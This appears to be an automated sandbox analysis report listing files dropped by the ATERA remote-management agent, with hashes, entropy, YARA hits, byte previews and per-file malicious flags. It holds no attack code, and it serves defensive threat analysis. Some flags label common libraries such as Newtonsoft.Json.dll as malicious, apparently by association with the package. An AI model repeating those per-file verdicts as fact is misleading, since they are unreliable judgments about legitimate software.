                                                                                                                                                                                                                                                                                              SHA-512:AD81FFC5933C38153A955C16EB1E36CD7D7C950B68B281A4CF7C5CC706072D5B16B96C7967D881C066434896F5750602792D2FF8FB3EC2E46C7007BA5A422185
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..06/01/2025 06:58:35 Failed to set key: RequestPermissionOption with value: ..Exception: System.ArgumentNullException: Value cannot be null...Parameter name: value.. at System.ThrowHelper.ThrowArgumentNullException(ExceptionArgument argument).. at Microsoft.Win32.RegistryKey.SetValue(String name, Object value, RegistryValueKind valueKind).. at AgentPackageSTRemote.Persistence.AteraSettings.WindowsAteraSplashtopRegistry.SetValue(String key, Object value, SettingKeyType settingKeyType)..06/01/2025 06:58:35 Failed to set key: RequirePasswordOption with value: ..Exception: System.ArgumentNullException: Value cannot be null...Parameter name: value.. at System.ThrowHelper.ThrowArgumentNullException(ExceptionArgument argument).. at Microsoft.Win32.RegistryKey.SetValue(String name, Object value, RegistryValueKind valueKind).. at AgentPackageSTRemote.Persistence.AteraSettings.WindowsAteraSplashtopRegistry.SetValue(String key, Object value, SettingKeyType settingKeyType)..06/01/2025

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):687102
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9992259812758135
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:YQCewZw3IoWZyN0mMaER+jcyO3IPYpP9UE9bIIVwSTgSC7mxc:YreT3xGmMaVjcKPEPR9bIIhYh
                                                                                                                                                                                                                                                                                              MD5:96E50BBCA30D75AF7B8B40ACF8DDA817
                                                                                                                                                                                                                                                                                              SHA1:4B1255280DFF8DE8B7BE47DEF58F83F6EC39DED6
                                                                                                                                                                                                                                                                                              SHA-256:A3AD00CCB61BC87D58EB7977F68130B78A0B95E74D61E6A4624AC114CCDE5736
                                                                                                                                                                                                                                                                                              SHA-512:0034C08CB878B703F272E3FD2734BB928FF1BDBA85CF79A151519B019C83BD4D199C80AF0AA30DB28EF82F7EE68A9D59DCAEDE92F83BFE8787F6A5D4D5E9817C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....|G.Y~...........3...AgentPackageSystemTools/AgentPackageSystemTools.exe....(........j.......Ft..Q.h.;o..'..dc..x....W...<a6.R....[C?.}....$.Z#...T/....1.Wa.k~..............~..L.+..O.r.........b..(Y...|....Z...f..@..c...N.@.B<..........fc7.p.e.M.+....\..X...1. ....Z..~.O.d.... .....q.-<^.ER..Eic:.+..O.w....W.[.5..d-.d...S.TJ....[.d...I.V?19.w|..:.XF..\........?....a..W.....i.......~....9..Z..0".....P....rD..k..5..6...#l3...@.....E`.....O+......J|...x.@.^....Rs.F4.Dt..*.......T..+.....\..O.....8..O..e....==J.....-\.vk....oG.jk....g9H.K...Qd.>...U.N<.A(?......k.... ~.4...@Iy..h."`n......JD..%..Rw.....P/..!<S.4q=...R[S..Nyx.+....C..x...c..o.e'.6...9..*."M/. Zr.z.Q.H..T....F...W.....&..G.Am4g....Q.X..y`.m.gC1...G~.0Y...[R\QL99[.Ad.....]=.....D.t@....NV?..M....t.d.M.U%.c.._........&..S..z..Q.........|B...Ih...../...0.;...Q.51c.S..D3.`.(o..z.....8a....j..xZ.....R]ln.d.|../.....< ...B.X..64.xK........s......jd.m.H..|...Dy.....`'...B

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.286975372577971
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:isXr7JfmSn0jVGcxf3OI3NjkfE53Tnz8zHFeDZkqEpYi60yHv:iOFnart3NwfE5Dz8REZkL76bHv
                                                                                                                                                                                                                                                                                              MD5:5BB0687E2384644EA48F688D7E75377B
                                                                                                                                                                                                                                                                                              SHA1:44E4651A52517570894CFEC764EC790263B88C4A
                                                                                                                                                                                                                                                                                              SHA-256:963A4C7863BEAE55B1058F10F38B5F0D026496C28C78246230D992FD7B19B70A
                                                                                                                                                                                                                                                                                              SHA-512:260B661F52287AF95C5033B0A03AC2E182211D165CADB7C4A19E5A8CA765E76FC84B0DAF298C3ECCB4904504A204194A9BF2547FC91039C3EC2D41F9977FF650
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.........."...0.............^.... ........@.. ...................................`.....................................O.......`...............((........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...`...........................@..@.reloc..............................@..B................@.......H........C...r...........................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o......s....%.o........o......s...........s....%......io....%o......o........o ...o .....(!...*..0..........r...p... .....r...p.(.....o......(.....o.......("..........s......[o......s....%.o........o#.......s$..........s.......i.J.....%......io%.......o ...o ...(.........o&...*..('...*...0..].........~(....~(....~(........

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):923
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.156246271896278
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:Jds4F7k1hOXrRT2/2E10PT2/+w0E1UrPT2/+7Trln:3ss757Rkqk+wik+7Nn
                                                                                                                                                                                                                                                                                              MD5:D6FCBCF9C6ABC2F051772E7A7D5EDFD5
                                                                                                                                                                                                                                                                                              SHA1:33D9962BCC42F021A7CEADF3D1C613B4643C66F6
                                                                                                                                                                                                                                                                                              SHA-256:F523D40AE141AA8899B053D77117FCF50639708757AD4A050F3A11E8582A894A
                                                                                                                                                                                                                                                                                              SHA-512:07DA40F1C43A1E35582ADE5DBBAEB47EC2922C42241BD4B950EFA76407597CF838338E27F3F5197E02F5209B27542207BEDBA9B85681955E3C326C95C1F5AC22
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />...</startup>...<runtime>....<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.....<dependentAssembly>......<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.....</dependentAssembly>....</assemblyBinding>...</runtime>..</configuration>

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXSgXn:WBZXn
                                                                                                                                                                                                                                                                                              MD5:EB0865EBB86960EC4069DECECBF43ABC
                                                                                                                                                                                                                                                                                              SHA1:9BA2E92AB9F9DB9242EFDC5FA356B2D7D1F52D7D
                                                                                                                                                                                                                                                                                              SHA-256:BEFABB04180AC3DA1D823D4CDF9F3636832F5115BC42F7E39CB26A56FB794CA4
                                                                                                                                                                                                                                                                                              SHA-512:5E8BDA4CA7B3C89FD38BE682DB8D5BB1B5567CE1A25116D539A1510BDAF11E3EBFAE835EC1B54BEDF5D38DACE58EEE63AFCD8049874DBFBB02A34B368AA25322
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=27.12

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.Mutex.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):14888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.879525569919863
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:wC9aM0P8P2Nyby2sE9jBF6IYiYF85S35IVnxGUHFi3o86A/pT:wC9abP8ONyb8E9VF6IYijSJIVxu6A/pT
                                                                                                                                                                                                                                                                                              MD5:8BD230F842430C8DD3BE4722B15A779B
                                                                                                                                                                                                                                                                                              SHA1:34422CB7617698BEB5CE61D24C2FC4935F8DEEA9
                                                                                                                                                                                                                                                                                              SHA-256:E94DB759123A44C61ADDF525BBF3E08FFA85529061A48D68BC636F171A3EFB77
                                                                                                                                                                                                                                                                                              SHA-512:A7BCDB7613E74CBDDDEDAE8A895B91F21AFF9464A52D0EC5DDD3144DE9F2AB2CB2D3A7C2A1C976E0AB982A122332DE54787B6C2F3FB1BDD529FA974154420772
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............'... ...@....... ....................................`..................................'..O....@..L...............((...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................'......H........ ..............................................................R.(.......s....}....*2.{....o....*6.{.....o....*BSJB............v4.0.30319......l.......#~..p...l...#Strings............#US.........#GUID...........#Blob...........W..........3..................................................................8.....@...........k.g.................................T...........].V.....V...................A.!...........H.!.1.....!.c.).........V.............8.....P ............

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):112680
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1795911171130955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:QtsGQngrGJbFzxsIehOKHbevOblTQFHMbd6U/pC18VdUEvfkAS07K760:Q6fBzxWoOOibd6U/Y18hK07KD
                                                                                                                                                                                                                                                                                              MD5:195C0C9415221A7144C7614FE4A7487F
                                                                                                                                                                                                                                                                                              SHA1:2FF047CA961B801683E0FF1832475B3C7C3E1B15
                                                                                                                                                                                                                                                                                              SHA-256:A9E0FD283F4B8CDAE56E1AE2C8996489B7FF9379B0029A6C9AE71FE9DADCC12E
                                                                                                                                                                                                                                                                                              SHA-512:74DA09B893D2F0CD9F7542D7822E23B911C9900DD00A0E7458964901A9C03C4A42E848F2A1C1DE3592261A2D0626DD82964731CB5A918FE31EDD31F4A32CF01A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.........." ..0.............6.... ........... ...............................~....`....................................O.......8...............((........................................................... ............... ..H............text...<.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H.......8...t"...........................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p( ...r...p(!.........("...(#.....&..*........00......:.(......}....*..0..Z............($...,......(%...*~..........(&........($...-..(....s'...........,..((.........(%...*..........&E.......0..G........{....,.(......5~)...r'..po*...rm..pr...po+...td...r...p(,..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\CredentialManagement.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):38952
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.309196886140639
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:/INsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgYF:gNsii6v/HS0+OJd5gpKm76tga
                                                                                                                                                                                                                                                                                              MD5:B27F689B547835884AADE60304FC4860
                                                                                                                                                                                                                                                                                              SHA1:72A9C72DC7F0D0312F09BBE3F605A36AF9D814B3
                                                                                                                                                                                                                                                                                              SHA-256:01F80C32D73709B034E346256E4240F8A4336C7413A6B5F2DE3309F2233F53E0
                                                                                                                                                                                                                                                                                              SHA-512:7BDF3A1B5895F31205D17E6A02A495D8875B0F0F802E0C1AD1F95DE391BD1317CCFD8C0A772EF4FB993598E746FBF203CE87E20AB46544C6F9A1C1101AE2E2B9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..T...........!.....f............... ........... ..............................A.....@....................................O....................p..((........................................................... ............... ..H............text...$d... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H........2...O...........................................................0..+.......s.........~....%.(.....s............(.....*..........#........,..%{.....`}....*.%{.....f_}....*..0..>.......................(....}=......}>......( ...}@......(....}?....*R.{....,.r...ps....z*:..(.....(....*...0............(.......(.....*...................J.{....-..&..}....*6.(.....{....*:.(......}....*6.(.....{....*..(.....(....,.r]..ps....z.o ... ....1.r]..ps!...z..}....*6.(.....{....*..(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.854928178747648
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:D1c5aLPiraWj4/wLNyb8E9VF6IYijSJIVx99hvHalN:D1cGmXNHEpYi60X9SN
                                                                                                                                                                                                                                                                                              MD5:63BDE840E460E4C8546366DF319B2C1A
                                                                                                                                                                                                                                                                                              SHA1:9DA75B897704BA1B28091F1D442A832EB175D648
                                                                                                                                                                                                                                                                                              SHA-256:5907BFCC210749BDC7619CB1A433C90A3280005D5DA344D134748B336F86EB55
                                                                                                                                                                                                                                                                                              SHA-512:04C3248EE12D7E199B7B9EA45C9B001082D1D6E8BE166F2BAFDCF28F4ABD9B029A08610ACA0ABAFA968C1E3361042876F410E2000FB97A1500D5FA60C4026D08
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.........."...0..............-... ...@....@.. ..............................Th....`..................................,..O....@..................((...`.......+............................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........!..$............................................................0../.......................(....}......(....&(.....{....Y*..0..D.......................(....}......(....-.(.......(....s....z(.....{....Yn*..(....*.0..t.......r...pr...p...s......o.... ....(.....s......o....&s......(....vl(....o......o.....!..(....&..(....o....&.o......&...*......S..o........7..R.!....BSJB............v4.0.30319......l...T...#~..........#Strings....\...4...#US.........#GUID...........#Blo

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1017
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.00184675687532
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdArdEtPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3Ar+z7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:8A743B2BAC31EB00D4BDA0EBC8DF160B
                                                                                                                                                                                                                                                                                              SHA1:5564F6A8F02973D040E8409E21B2A18ECA2CA8EB
                                                                                                                                                                                                                                                                                              SHA-256:31A69A6D9423CE1BCF98F5281DEB1B8F537D95609CDFA03AF9A41CBF00D1243A
                                                                                                                                                                                                                                                                                              SHA-512:9F14C687EF076CEB4B903E2C5803DCB9401BDEADC00B0E090765E67B54E9BEEC733B087609D76C605C8485C7E446E8DB3A0D8AA3E17C969FC155F069070BB543
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.134206560185113
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:3jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvO:3+e55LgIkTmyAAfTnMLvO
                                                                                                                                                                                                                                                                                              MD5:F391CCB7426246CEF39937C6C85FFCF5
                                                                                                                                                                                                                                                                                              SHA1:925186A6A3F52512E3547EFB94AF3CE8C8A19F9F
                                                                                                                                                                                                                                                                                              SHA-256:506D6F045E379C944291C4D42877AC80D767FE761DB878C60D4907862395509D
                                                                                                                                                                                                                                                                                              SHA-512:CB86079DF5D791C1900466B079BEF0614B873C3617B85A02C32E4C052ABFF0C7B87429BA5062F8FBF878ACDB4E9D74B69516DB2C4628677DF05D109624DCE99D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`.......I....`.................................v...O.... ..................((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960602645180309
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:mBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUc:mBjk38WuBcAbwoA/BkjSHXP36RMGt
                                                                                                                                                                                                                                                                                              MD5:FCA140489085D8088D8A3BBC0EADF117
                                                                                                                                                                                                                                                                                              SHA1:2EB49B4E7253D242EB7C2581453B11DCE83848FA
                                                                                                                                                                                                                                                                                              SHA-256:89DF8434C10815C95DEC04BA45F9E7AA07DA3AE3B01227069F28F503DB8A6ABB
                                                                                                                                                                                                                                                                                              SHA-512:F38226E0B6222F5FFA37C1DDFF42364574E50D7B2324AD11931E6A38A679E2AE7930C5B373CCB179AD36F229620DDDF9A1E20E4CF27FC2185698DC1B49F2BD07
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18472
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.7042894099808645
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:OqfstMuZM62t0Nyb8E9VF6IYijSJIVxxCRFa8:OnMu66e0EpYi60EX
                                                                                                                                                                                                                                                                                              MD5:3F901D04C4F0639CD2A8EB0658934363
                                                                                                                                                                                                                                                                                              SHA1:020C122AC62E2D8DAED6F6E3F565AD95020DC7C9
                                                                                                                                                                                                                                                                                              SHA-256:8D3EA5FECD13346F6CF7C1DD22A9A4ACEAB933237315F2CDB3E3336D203415F6
                                                                                                                                                                                                                                                                                              SHA-512:DC5A4A8C7DBE10CA75A859CE252EBA04949E41990CEBA19981ADAC781009A666B83AB71C9A093812CE23BC3FA24405494C5F60C837C20E91268B28F2982464F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.........."...0..............4... ...@....@.. ...................................`.................................d4..O....@............... ..((...`......,3............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H.......(#..............................................................6.(.....(....*...0..........s....%r...po......o......&..*....................0..%.......r!..p.s.......o.......,..o.......&..*.......................!!.......0..........r_..p(......i...r...p(....*....r...p....s.....r_..p(.....o.... ....(.....s........(....-.........o.....o.....o....(.......l&..-.s....%.o....%r...po.......L....(....o....&..&...o....,%.o....( ...-..o....(!...,..o....(".....,..o.....*....4..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):975
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.005145470654642
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdsHPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3st7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:DB02B24A7803C99F651940FECBE6E283
                                                                                                                                                                                                                                                                                              SHA1:34EF3032B61E369535658D72BCE1E9908888EA0A
                                                                                                                                                                                                                                                                                              SHA-256:207C4D442FACD06379217DD915D85D926DD622E72F6DB5814753FD2E5F8D0048
                                                                                                                                                                                                                                                                                              SHA-512:9C76B6E3DBB34E2729F5C0E49A2A195C87AE11916A4479676AD09EE2C182DD83F87E826BA39DDF410B99A82EF1053571AA7A1E97426D396794C6E25E066C3849
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
